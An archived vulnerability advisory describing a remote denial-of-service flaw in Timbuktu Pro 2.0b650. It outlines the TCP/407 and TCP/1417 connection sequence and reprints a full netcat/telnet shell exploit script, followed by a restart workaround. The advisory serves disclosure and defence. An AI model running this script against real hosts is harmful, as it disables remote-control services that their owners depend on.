Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: tb3.htm

Timbuktu Pro 2.0b650 Remote Denial of Service



Vulnerability

    Timbuktu

Affected

    Timbuktu Pro 2.0b650 (ested on Windows NT 4.0 until sp5)

Description

    Laurent Levier found following.   He found a Timbukto Pro  (Remote
    Control NT Tool) vulnerability.  "Exploit" is:

        - Connect and disconnect on port TCP/407 to make port TCP/1417 listening
        - Connect on port TCP/1417 with a simple telnet.
        - Disconnect from TCP/1417 (no data exchange).

    Authentication protocol waits indefinitely.  This brings  Timbukto
    Remote Control Denial-of-Service on control.  Physical contact  is
    then needed to restart it.   This problem also exists on 5.2.1  on
    the Macintosh platform.

    Exploit:

    #!/bin/sh
    
    ##########################################
    # eth0 is a member of b0f/buffer0verfl0w security  #
    #
    http://b0f.freebsd.lublin.pl
    #
    #########################################
    
    # *Needs netcat in order to work......*
    # Immune systems:
    # Timbuktu Pro 2000
    #
    # Vulnerable systems:
    # Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto)
    #
    # Exploit:
    #  - Connect and disconnect to port TCP/407 and port TCP/1417 will start
    
    # listening.
    #  - Connect on port TCP/1417 (using a simple telnet client).
    #  - Disconnect from TCP/1417 (with no data exchange).
    #
    # Workaround:
    # - Kill Timbuktu process (using pslist/pskill for example).
    # - Stop Timbuktu services.
    # - Start them again.
    
    
    echo "Exploit:"
    echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will
    start listening."
    echo " - Connect on port TCP/1417 (using a simple telnet client)."
    echo " - Disconnect from TCP/1417 (with no data exchange)."
    echo "Coded: eth0 from buffer0vefl0w security (b0f)"
    echo "[http://b0f.freebsd.lublin.pl]"
    
    echo "Checking if host is actually listening on port 407"
    telnet $1 407 1>.timb.tmp 2>.timb.tmp &
    echo "Sleeping 5 seconds..."
    sleep 5
    killall -9 telnet 1>/dev/null 2>/dev/null
    cat .timb.tmp | grep "Connected" >/dev/null 2>&1
    if [ $? -eq 0 ]; then
     timb="1"
    echo "[$1] is listening on port 407..."
    echo "Exploiting:..."
    nc $1 1417 1>/dev/null 2>/dev/null
    sleep 3
    killall -9 nc 1>/dev/null 2>/dev/null
    echo "Done!!"
    fi
    if [ "$timb" != "1" ]; then
     echo "[$1] Is not listening on port 407 = doesn't exist..."
    fi

Solution
    
    Solution to get back operational:

        - Kill timbuktu process (using pslist/pskill for example)
        - Stop Timbuktu services
        - Start them again.

    No patches yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH